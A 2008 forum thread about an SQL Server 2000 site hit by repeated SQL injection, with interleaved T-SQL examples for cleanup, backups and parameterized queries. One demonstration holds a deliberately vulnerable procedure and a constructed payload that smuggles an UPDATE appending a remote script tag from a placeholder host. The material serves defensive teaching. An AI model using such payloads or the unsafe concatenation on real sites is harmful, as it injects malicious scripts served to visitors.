MS SQL Server 2000


cancer10
05-15-2008, 12:52 PM
Hi

I have an MS SQL 2000 DB on my shared server. My site is getting hacked almost every alternate day. There are more than 500 ASP pages and it's not possible for me to open every page and secure the user input.

Currently the hacker has appended some JS script tag all over my tables (I have more than 150 tables in the DB). I do not have a backup at the moment, so the only thing I can do is replace that JS tag with NULL values.

Now Question:

1) Is there any function/query/stored procedure in MS SQL Server 2000 which would replace a value with another throughout all the tables in my DB?

2) Is there any script that I can use to keep a backup of my DB? Currently my host charges $10 for a one-time backup, so I can't really afford to pay them that money every day.

3) Also, what do you suggest to keep my site from being hacked?


Thanx
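Regarding question 1, the T-SQL below is an added example, not code from this thread: it walks every character column of every base table in the current database and strips an injected tag. The tag value is a placeholder assumption; set @tag to the exact string found in your data. It replaces the tag with an empty string rather than NULL, so the original text in each column survives. SQL Server 2000's REPLACE() does not accept text/ntext, so those columns are cast first and only rows that fit in the cast are touched, to rule out silent truncation.

```sql
-- Added example (not from the original thread): remove an injected <script> tag
-- from every char/varchar/nchar/nvarchar/text/ntext column in the current
-- database. Written for SQL Server 2000 (INFORMATION_SCHEMA, sp_executesql).
SET NOCOUNT ON

-- ASSUMPTION: placeholder value; paste the exact tag you see in your tables here.
DECLARE @tag NVARCHAR(1000)
SET @tag = N'<script src="http://EXAMPLE-HOST/x.js"></script>'

DECLARE @owner SYSNAME, @table SYSNAME, @column SYSNAME, @type SYSNAME
DECLARE @tbl NVARCHAR(600), @col NVARCHAR(300), @cast NVARCHAR(20)
DECLARE @sql NVARCHAR(4000), @rows INT, @skipped INT

-- Every updatable character column of every base table (views and computed
-- columns are skipped because they cannot be updated).
DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME, c.DATA_TYPE
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext')
      AND COLUMNPROPERTY(OBJECT_ID(QUOTENAME(c.TABLE_SCHEMA) + '.' + QUOTENAME(c.TABLE_NAME)),
                         c.COLUMN_NAME, 'IsComputed') = 0

OPEN cols
FETCH NEXT FROM cols INTO @owner, @table, @column, @type
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @tbl = QUOTENAME(@owner) + N'.' + QUOTENAME(@table)
    SET @col = QUOTENAME(@column)

    IF @type IN ('text', 'ntext')
    BEGIN
        -- DATALENGTH is in bytes: 8000 bytes is 8000 text chars or 4000 ntext
        -- chars, exactly what the cast type holds, so nothing can be truncated.
        SET @cast = CASE @type WHEN 'text' THEN N'VARCHAR(8000)' ELSE N'NVARCHAR(4000)' END
        SET @sql = N'UPDATE ' + @tbl + N' SET ' + @col
                 + N' = REPLACE(CAST(' + @col + N' AS ' + @cast + N'), @tag, N'''')'
                 + N' WHERE DATALENGTH(' + @col + N') <= 8000'
                 + N' AND CHARINDEX(@tag, CAST(' + @col + N' AS ' + @cast + N')) > 0;'
                 + N' SELECT @rows = @@ROWCOUNT;'
                 -- Longer values are left alone and counted so you can fix them
                 -- with UPDATETEXT (note: %, _ and [ inside @tag act as LIKE wildcards here).
                 + N' SELECT @skipped = COUNT(*) FROM ' + @tbl
                 + N' WHERE DATALENGTH(' + @col + N') > 8000'
                 + N' AND ' + @col + N' LIKE N''%'' + @tag + N''%'''
    END
    ELSE
    BEGIN
        SET @sql = N'UPDATE ' + @tbl + N' SET ' + @col
                 + N' = REPLACE(' + @col + N', @tag, N'''')'
                 + N' WHERE CHARINDEX(@tag, ' + @col + N') > 0;'
                 + N' SELECT @rows = @@ROWCOUNT, @skipped = 0'
    END

    -- The tag travels as a parameter, so quotes or other characters in it
    -- cannot break (or inject into) the generated statement.
    EXEC sp_executesql @sql,
         N'@tag NVARCHAR(1000), @rows INT OUTPUT, @skipped INT OUTPUT',
         @tag = @tag, @rows = @rows OUTPUT, @skipped = @skipped OUTPUT

    IF @rows > 0
        PRINT N'cleaned ' + CAST(@rows AS NVARCHAR(10)) + N' row(s) in ' + @tbl + N'.' + @col
    IF @skipped > 0
        PRINT N'WARNING: ' + CAST(@skipped AS NVARCHAR(10)) + N' row(s) in ' + @tbl + N'.' + @col
            + N' exceed 8000 bytes and still contain the tag; fix those with UPDATETEXT'

    FETCH NEXT FROM cols INTO @owner, @table, @column, @type
END
CLOSE cols
DEALLOCATE cols
```

Before running it, take whatever backup you can: `BACKUP DATABASE YourDb TO DISK = 'D:\Backups\YourDb.bak' WITH INIT` if the host grants that permission (many shared hosts do not), otherwise at least wrap the loop in `BEGIN TRAN` / `ROLLBACK` for a first dry run and read the PRINT output before committing. Cleaning the data does nothing about how it got in; until the injection point in the ASP pages is closed, the tag will be back.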

malfist
06-09-2008, 10:02 PM
There are more than 500 ASP pages and it's not possible for me to open every page and secure the user input.

Then you sir, have a problem. Both a hacker problem and a design problem.

brazenskies
06-09-2008, 10:28 PM
Why on God's given earth do you have 500 pages?

cancer10
06-10-2008, 05:48 AM
Why on God's given earth do you have 500 pages?

Because my site is that big

malfist
06-10-2008, 07:00 PM
I would doubt any website would need 500 pages, unless it was pure static content. You need to revise your design. What do all the 500 pages do? If they do something similar, they should be loaded dynamically, not just slightly either. Have you looked into OOP?

demtron
06-10-2008, 07:47 PM
In response to #2, if your hosting company allows you to connect SQL Enterprise Manager to their SQL Server (most do not), then you could use a DTS package to extract your data out. Alternatively, you could use ASP.Net and SQL Server Management Objects to create scripts for you. I'm afraid I'm unable to share the code for that, but you can find more info by doing a Google search for "sql server smo". SQLServerCentral.com has some good tutorials on this.

Regarding #3, this may be happening through SQL injection attacks. I recently helped another IT company to recover from such an attack. Again, a Google search on this topic will help you identify some of the possible holes in your site.

Good luck!
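On question 2, a scheduled job is the simpler alternative to DTS or SMO when the server's own BACKUP DATABASE is available. The T-SQL below is an added example, not from this thread or from SQL Server's documentation: it creates a nightly SQL Server Agent job with the msdb stored procedures that exist on SQL Server 2000. The database name, backup path and schedule are placeholder assumptions, and it assumes the login used has permission to create jobs and to run BACKUP DATABASE; on a shared host that is frequently not the case, in which case this is the job to ask the host to set up.

```sql
-- Added example (not from the thread): nightly full backup job for SQL Server 2000.
-- ASSUMPTIONS: database name, path and 02:00 schedule are placeholders; the job
-- writes to the database server's own disk, so a way to fetch the file is still needed.
USE msdb
GO
DECLARE @db SYSNAME, @cmd NVARCHAR(1000)
SET @db = N'YourDatabase'   -- placeholder

-- The step's own T-SQL: a dated file name computed at run time, a full backup
-- to it, and a RESTORE VERIFYONLY so a corrupt backup shows up as a failed job.
SET @cmd = N'DECLARE @f NVARCHAR(260); '
         + N'SET @f = N''D:\Backups\' + @db + N'_'' + CONVERT(NVARCHAR(8), GETDATE(), 112) + N''.bak''; '
         + N'BACKUP DATABASE ' + QUOTENAME(@db) + N' TO DISK = @f WITH INIT; '
         + N'RESTORE VERIFYONLY FROM DISK = @f'

EXEC sp_add_job @job_name = N'Nightly backup', @description = N'Full backup every night', @enabled = 1
EXEC sp_add_jobstep @job_name = N'Nightly backup', @step_name = N'Full backup',
     @subsystem = N'TSQL', @database_name = N'master', @command = @cmd
-- freq_type 4 = daily, freq_interval 1 = every day, time is HHMMSS.
EXEC sp_add_jobschedule @job_name = N'Nightly backup', @name = N'Every day at 02:00',
     @freq_type = 4, @freq_interval = 1, @active_start_time = 020000
EXEC sp_add_jobserver @job_name = N'Nightly backup', @server_name = N'(local)'
GO
```

If job creation is refused but `BACKUP DATABASE` itself works, run the step's statements by hand from a scheduled task on your own machine through osql; if neither is permitted, the DTS or SMO route above (or a plain per-table export) is what remains. Either way, a backup that exists only on the host's disk is still far better than none, which is the situation described in the first post.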

malfist
06-10-2008, 07:55 PM
PHP has two functions you would want: htmlspecialchars and htmlentities. They do the same thing. What they do is strip the HTML or JavaScript or whatever else from the data they are given and convert it to a harmless equivalent. For example, it changes '<' to &lt;.

However, you also need a device to escape the SQL from other SQL. PHP has mysql_real_escape_string, but that can only be used with an open MySQL database connection. I would suggest, as demtron said, that you google SQL injection and figure out how to defend yourself from it. I'm unfamiliar with what it would require to escape MS SQL Server SQL.
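On what escaping for MS SQL Server would require: the answer is that on SQL Server the input should not be escaped at all but passed as a parameter, and the tag appended to every row in the first post is what happens when it is concatenated instead. The T-SQL below is an added example, not code from this thread; the Products table, its columns and the procedure names are hypothetical, and the payload is constructed for the demonstration. It shows the same lookup written the way that gets injected, the way that cannot be, and the way to build a statement dynamically without reopening the hole.

```sql
-- Added example (not from the thread). ASSUMPTION: dbo.Products and all names below
-- are hypothetical; the table is created here as a throwaway for the demonstration.
CREATE TABLE dbo.Products (ProductID INT PRIMARY KEY, Name NVARCHAR(200), Price MONEY)
GO
INSERT dbo.Products VALUES (1, N'Widget', 9.99)
INSERT dbo.Products VALUES (2, N'Gadget', 19.99)
GO

-- VULNERABLE: the input becomes part of the statement text. With @id set to
--   1; UPDATE dbo.Products SET Name = Name + '<script src="http://EXAMPLE-HOST/x.js"></script>'--
-- the UPDATE runs as well, which is how a tag ends up in every row of a table.
-- Doubling quote characters would not help: a numeric id is never quoted.
CREATE PROCEDURE dbo.GetProduct_Unsafe @id VARCHAR(200) AS
    EXEC('SELECT ProductID, Name, Price FROM dbo.Products WHERE ProductID = ' + @id)
GO

-- SAFE: the id is a typed parameter, so the statement text never changes.
CREATE PROCEDURE dbo.GetProduct_Safe @id INT AS
    SELECT ProductID, Name, Price FROM dbo.Products WHERE ProductID = @id
GO

-- SAFE even when the statement must be assembled at run time: the value goes
-- through sp_executesql as a parameter, and LIKE wildcards in the input are
-- escaped so that searching for "%" cannot list the whole table.
CREATE PROCEDURE dbo.FindProducts_Safe @name NVARCHAR(100) AS
    DECLARE @sql NVARCHAR(4000), @pattern NVARCHAR(300)
    SET @pattern = N'%' + REPLACE(REPLACE(REPLACE(@name,
                       N'[', N'[[]'), N'%', N'[%]'), N'_', N'[_]') + N'%'
    SET @sql = N'SELECT ProductID, Name, Price FROM dbo.Products WHERE Name LIKE @p'
    EXEC sp_executesql @sql, N'@p NVARCHAR(300)', @p = @pattern
GO

-- Demonstration against the throwaway table (the payload is constructed):
DECLARE @payload VARCHAR(200)
SET @payload = '1; UPDATE dbo.Products SET Name = Name + ''<script src="http://EXAMPLE-HOST/x.js"></script>''--'
EXEC dbo.GetProduct_Unsafe @payload   -- the UPDATE runs: every Name now carries the tag
EXEC dbo.GetProduct_Safe 1            -- only ever selects; passing @payload here is a type error
EXEC dbo.FindProducts_Safe N'%'       -- matches a literal "%" only, so no rows come back
SELECT ProductID, Name FROM dbo.Products  -- shows the damage done by the unsafe call
GO
```

On the classic ASP side, the equivalent of the safe versions is to call the procedures through an ADODB.Command (CommandType adCmdStoredProc, values supplied with Parameters.Append and CreateParameter) instead of building the SQL string from Request values. With 500 pages the job can be narrowed by searching the source for Request.Form, Request.QueryString and Request.Cookies appearing inside strings handed to .Execute or .Open; those are the pages that have to change first.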